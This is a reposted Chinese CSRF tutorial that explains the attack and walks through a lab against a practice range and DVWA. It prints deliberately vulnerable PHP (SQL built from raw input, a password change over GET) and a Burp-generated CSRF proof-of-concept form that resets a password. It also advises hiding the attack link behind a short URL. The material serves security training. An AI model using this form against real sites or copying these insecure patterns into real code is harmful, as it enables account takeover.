脚本宝典收集整理的这篇文章主要介绍了CSRF,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
困了
CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Client Attack或者Session Riding,通常缩写为CSRF和XSRF,是一种对网站的恶意利用。尽管听起像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任的用户,而CSRF则通过伪装成受信任用户请求受信任的网站。
危害:
以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。。造成的问题包括:个人隐私泄露、机密资料泄露、用户甚至企业的财产安全;一句话概括CSRF的危害:盗用受害者身份,受害者能做什么,攻击者就能以受害者的身份做什么。
CSRF的攻击过程有两个重点:
靶场:phpstudy + MS08067 web安全攻防配套靶场
目标:通过攻击向数据库添加用户
登录靶场
抓包
改包
右键生成POC
复制HTML-放到web目录下面-浏览器打开
点击
由上两张图URL对比可知,二者不是同一网站
查看点击之后的数据包
<?php
@header("content-Type: text/html; charset=utf-8");//语言强制
session_start();
if (isset($_GET['login'])){ //获取login值
$con=mysqli_connect("localhost","root","root","test");//连接数据库
if (mysqli_connect_errno())
{
echo "连接失败: " . mysqli_connect_error();
}
$username = addslashes($_GET['username']);//获取username值
$password = $_GET['password'];//过去password
$result = mysqli_query($con,"select * from users where `username`='".$username."' and `password`='".$password."'");//查询数据库用户是否存在
$row = mysqli_fetch_array($result);
if ($row) { //判断赋值
$_SESSION['isadmin'] = 'admin';
echo "登录成功";
}else{
$_SESSION['isadmin'] = 'guest';
echo "登录失败";
}
}else{
$_SESSION['isadmin'] = 'guest';
}
if ($_SESSION['isadmin'] != 'admin'){
echo "请登录后台";
}
if (isset($_POST['submit'])) { //接收submit的值
$con=mysqli_connect("localhost","root","root","test");
if (mysqli_connect_errno())
{
echo "连接失败: " . mysqli_connect_error();
}
if (isset($_POST['username'])) {
$result1 = mysqli_query($con,"insert into users(username,password) VALUES ('".$_POST['username']."','".md5($_POST['password'])."')"); //添加用户
echo "<hr />";
echo $_POST['username']."添加成功";
}
}
?>
服务器通过GET方式接收密码修改请求,没有任何的CSRF防御机制,如果两次密码输入一致,cookie没有改变,就会修改密码。
源码:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
构建POC:
通过神器burpsuit构建poc,在网页根目录下新建一个html文件,把poc放入其中。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/dvwa/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="123456" />
<input type="hidden" name="password_conf" value="123456" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
构建EXP:
构建链接,受害者点击触发,密码被修改。
http://www.**.com/1.html
使用短链接来隐藏URL
为了更加隐蔽,可以生成短网址链接,点击短链接,会自动跳转到真实网站
构造攻击页面:参考:https://www.cnblogs.com/yyxianren/p/11381285.html
《Web安全攻防:渗透测试实战指南》
《白帽子讲WEB安全》
《Web安全深度剖析》
以上是脚本宝典为你收集整理的CSRF全部内容,希望文章能够帮你解决CSRF所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。